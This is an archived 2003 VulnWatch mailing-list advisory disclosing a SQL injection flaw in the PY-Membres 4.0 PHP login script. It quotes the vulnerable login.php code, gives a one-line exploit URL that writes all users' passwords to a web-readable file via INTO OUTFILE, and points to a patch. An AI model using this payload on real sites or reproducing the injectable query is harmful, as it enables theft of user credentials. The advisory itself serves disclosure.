[VulnWatch] PY-Membres 4.0 (PHP)
From: Frog Man (leseulfrog@hotmail.com)
Date: 04/06/03
- Previous message: Auriemma Luigi: "[VulnWatch] Abyss X1 1.1.2 remote crash"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: "Frog Man" <leseulfrog@hotmail.com> To: vulnwatch@vulnwatch.org Date: Sun, 06 Apr 2003 20:16:25 +0200
Informations :
°°°°°°°°°°°°°°
Website : http://www.py-scripts.com/
Tested version : 4.0
PHP Config : magic_quotes_gpc=OFF
Problem : SQL Injection
PHP Code/Location :
°°°°°°°°°°°°°°°°°°°
login.php :
------------------------------------------------------------------------
<?
session_start();
session_name("pys");
include("config.php");
include("functions.php");
est_vide($login,"Vous n\'avez pas saisi de login !");
est_vide($pass,"Vous n\'avez pas saisi de mot de passe !");
connexiondb();
$sql = "SELECT passwd FROM $db_table WHERE login='$login'";
$req = mysql_query($sql) or die('Erreur SQL
!<br>'.$sql.'<br>'.mysql_error());
$data = mysql_fetch_array($req);
if($data['passwd'] != $pass)
{
echo "<p>Mauvais login / password. Merci de recommencer</p>";
mysql_close();
exit;
}
else
{
$ploginy=$login;
session_register('ploginy');
$ip=$REMOTE_ADDR;
$host=gethostbyaddr($ip);
$log=date("d/m/Y à H\hi | ");
$log.=$ip." | ".$host;
$action = mysql_query("UPDATE $db_table SET lastlog='$log' WHERE
login='$ploginy'") or die (mysql_error()) ;
mysql_close();
Header("Location: membre.php");
}
?>
------------------------------------------------------------------------
Exploit :
°°°°°°°°°
http://[target]/login.php?login='%20OR%20ISNULL(NULL)%20INTO%20OUTFILE%20'/path/to/site/file.txt&pass=1
will save all users passwords into the file http://[target]/file.txt.
Solution :
°°°°°°°°°°
A patch can be found on http://www.phpsecure.info.
More Details In French :
°°°°°°°°°°°°°°°°°°°°°°°°
http://www.frog-man.org/tutos/PY-Membres4.0.txt
frog-m@n
_________________________________________________________________
- Previous message: Auriemma Luigi: "[VulnWatch] Abyss X1 1.1.2 remote crash"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
